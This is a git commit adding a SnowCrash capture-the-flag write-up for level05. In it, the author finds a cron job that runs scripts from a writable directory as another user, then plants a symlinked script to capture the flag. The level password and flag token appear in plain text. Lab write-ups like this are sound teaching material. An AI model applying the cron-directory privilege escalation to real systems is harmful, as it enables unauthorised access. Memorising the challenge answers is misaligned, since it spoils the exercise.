refactor(maiboyer): adding the maibaoyer directory
This commit is contained in:
Raphael
parent
db7f1343c5
commit
ab55d4de10
48 changed files with 0 additions and 0 deletions
76
maiboyer/level05/README.md
Normal file
76
maiboyer/level05/README.md
Normal file
|
|
@ -0,0 +1,76 @@
|
|||
# Level 05
|
||||
|
||||
## how to login
|
||||
|
||||
username: level05
|
||||
|
||||
password: ne2searoevaevoem4ov4ar8ap
|
||||
|
||||
## Goal
|
||||
|
||||
run `getflag` as user `flag05`
|
||||
|
||||
## Actually doing something
|
||||
|
||||
```bash
|
||||
level05@snowcrash.local.maix.me's password:
|
||||
You have new mail.
|
||||
level05@SnowCrash:~$
|
||||
```
|
||||
|
||||
This is weird, the only mail I have is my chain mail !
|
||||
|
||||
Jokes aside, looking at the files in the user's home, there is nothing other than the default ones.
|
||||
|
||||
This reeks of old program though. Nobody check mails directly when they login like this.
|
||||
|
||||
From my times on wikipedia *not working* I know that `/var/mail` sometimes exists, lets check it
|
||||
|
||||
```bash
|
||||
level05@SnowCrash:~$ ll /var/mail/level05
|
||||
-rw-r--r--+ 1 root mail 58 Jan 19 13:44 /var/mail/level05
|
||||
level05@SnowCrash:~$ cat /var/mail/level05
|
||||
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
|
||||
```
|
||||
|
||||
Oh wow, this looks like a nice cronjob
|
||||
|
||||
if we decipher the old text, we get something like this:
|
||||
|
||||
> Every two minutes (0, 2, 4, etc...) run the command `su -c "sh /usr/sbin/openarenaserver" - flag05`
|
||||
|
||||
so `su -c "text"` means "please run `text` as X" and the `- flag05` means "use as `flag05` and not `root` as your user"
|
||||
|
||||
so this runs `/usr/sbin/openarenaserver` every two minutes as the user `flag05`
|
||||
|
||||
lets read that script
|
||||
|
||||
```bash
|
||||
level05@SnowCrash:~$ cat /usr/sbin/openarenaserver
|
||||
#!/bin/sh
|
||||
|
||||
for i in /opt/openarenaserver/* ; do
|
||||
(ulimit -t 5; bash -x "$i")
|
||||
rm -f "$i"
|
||||
done
|
||||
```
|
||||
|
||||
It looks like it runs the files present in `/opt/openarenaserver` with a limit of 5s (cpu time) per process, and then remove that file
|
||||
|
||||
lets try to add a little script there (like say something that dumps the output of `getflag` to elsewhere?)
|
||||
|
||||
```bash
|
||||
``level05@SnowCrash:~$ cat <<EOF >/tmp/getflag05
|
||||
> #!/bin/sh
|
||||
> getflag >/tmp/flag05
|
||||
> chmod +r /tmp/flag05
|
||||
> EOF
|
||||
level05@SnowCrash:~$ chmod a+rx /tmp/getflag05
|
||||
level05@SnowCrash:~$ ln -s /tmp/getflag05 /opt/openarenaserver/flag
|
||||
level05@SnowCrash:~$ sleep 120 && cat /tmp/flag05
|
||||
Check flag.Here is your token : viuaaale9huek52boumoomioc
|
||||
```
|
||||
|
||||
And voila !
|
||||
We had to write the result to another file since otherwise the data would be lost to the ether (crontab stdio)
|
||||
|
||||
1
maiboyer/level05/flag
Normal file
1
maiboyer/level05/flag
Normal file
|
|
@ -0,0 +1 @@
|
|||
viuaaale9huek52boumoomioc
|
||||
1
maiboyer/level05/passwd
Normal file
1
maiboyer/level05/passwd
Normal file
|
|
@ -0,0 +1 @@
|
|||
ne2searoevaevoem4ov4ar8ap
|
||||
Loading…
Add table
Add a link
Reference in a new issue